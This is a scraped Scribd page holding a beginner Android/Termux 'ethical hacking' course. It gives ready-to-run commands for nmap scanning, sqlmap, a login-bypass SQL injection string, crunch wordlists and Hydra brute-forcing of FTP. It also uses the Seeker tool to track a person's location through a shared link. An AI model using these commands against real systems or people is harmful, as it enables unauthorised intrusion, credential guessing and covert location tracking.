Thanks to visit codestin.com
Credit goes to www.scribd.com

0% found this document useful (0 votes)
22 views7 pages

Full Ethical Hacking Course Android

The document outlines a three-week Ethical Hacking course designed for Android users, covering foundational concepts, tools, and techniques in ethical hacking. It includes practical exercises such as setting up Termux, using networking tools, and performing SQL injections, along with homework assignments to reinforce learning. The course emphasizes ethical practices and provides resources for legal hacking practice sites.

Uploaded by

feisalabdi7424
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
22 views7 pages

Full Ethical Hacking Course Android

The document outlines a three-week Ethical Hacking course designed for Android users, covering foundational concepts, tools, and techniques in ethical hacking. It includes practical exercises such as setting up Termux, using networking tools, and performing SQL injections, along with homework assignments to reinforce learning. The course emphasizes ethical practices and provides resources for legal hacking practice sites.

Uploaded by

feisalabdi7424
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

Ethical Hacking Course - Android Friendly

WEEK 1: FOUNDATIONS & SETUP

Day 1: What is Ethical Hacking?

Ethical hacking is testing systems legally to find weak points.

Types of Hackers:

- Black Hat: Illegal hackers

- White Hat: Legal ethical hackers

- Grey Hat: Mix of both

Common Attacks:

- Phishing: Fake links/emails

- SQL Injection: Database hacking

- Password Cracking: Guessing passwords

Homework:

- Watch a YouTube video on 'What is Ethical Hacking'

- Write the 3 hacker types and 2 attack types

Day 2: Install & Setup Termux

Steps:

1. Install Termux from https://f-droid.org (search 'Termux').

2. Open Termux and run:

pkg update && pkg upgrade -y


Ethical Hacking Course - Android Friendly

pkg install python git -y

Day 3: Learn Linux Commands

Try these in Termux:

pwd - Show current folder

ls - List files

cd folder - Change folder

mkdir test - Make folder

touch file.txt - Create file

rm file.txt - Delete file

Practice all commands.

Day 4: Networking Basics

Install tools:

pkg install net-tools

Check your IP:

ifconfig

Test internet:

ping google.com
Ethical Hacking Course - Android Friendly

Day 5: Scan Network with Nmap

Install:

pkg install nmap -y

Scan local network:

nmap -sP 192.168.1.0/24

Replace with your actual IP range.

WEEK 2: INFORMATION GATHERING & BASIC ATTACKS

Day 6: IP Tracking with Seeker

In Termux:

git clone https://github.com/thewhiteh4t/seeker

cd seeker

pkg install php openssh -y

pip install requests

python3 seeker.py

Share the link and monitor location (educational use only).

Day 7: Website Info using WHOIS

Install:
Ethical Hacking Course - Android Friendly

pkg install whois

Command:

whois example.com

Or use browser: https://who.is

Day 8: SQL Injection using SQLMap

Install:

git clone https://github.com/sqlmapproject/sqlmap

cd sqlmap

python3 sqlmap.py --help

Test site (legal):

python3 sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --batch --banner

Day 9: SQL Injection Theory

SQL Injection Example:

site.com/login.php?user=admin' OR '1'='1

This tricks the system into logging in without a real password.

Homework:

- What is SQL?
Ethical Hacking Course - Android Friendly

- What is SQL Injection?

- Why is it dangerous?

Day 10: Install Hydra

Install dependencies:

pkg install git make clang -y

Clone & compile:

git clone https://github.com/vanhauser-thc/thc-hydra

cd thc-hydra

chmod +x configure

./configure

make

./hydra -h

WEEK 3: PASSWORD CRACKING & PRACTICE

Day 11: Wordlists with Crunch

Install:

pkg install crunch

Create wordlist:

crunch 4 4 abc123 -o wordlist.txt

View:
Ethical Hacking Course - Android Friendly

cat wordlist.txt

Day 12: Use Hydra

Example command:

./hydra -l admin -P wordlist.txt ftp://192.168.1.5

Meaning:

- -l: Username

- -P: Wordlist

- ftp://: Target IP and service

Day 13: Review

Tools to review:

- nmap

- sqlmap

- seeker

- hydra

- whois

Practice with safe/legal systems only.

TryHackMe and HackTheBox are great for this.

Day 14: Mini Test Challenge

1. Scan your network with nmap


Ethical Hacking Course - Android Friendly

2. Use whois on 3 sites

3. Create a wordlist with crunch

4. Write what SQL injection is in your own words

Keep notes of your results.

FINAL NOTE

Reminder

Use your skills ethically.

Never hack without permission.

Sites to practice legally:

- https://tryhackme.com

- https://hackthebox.com

You might also like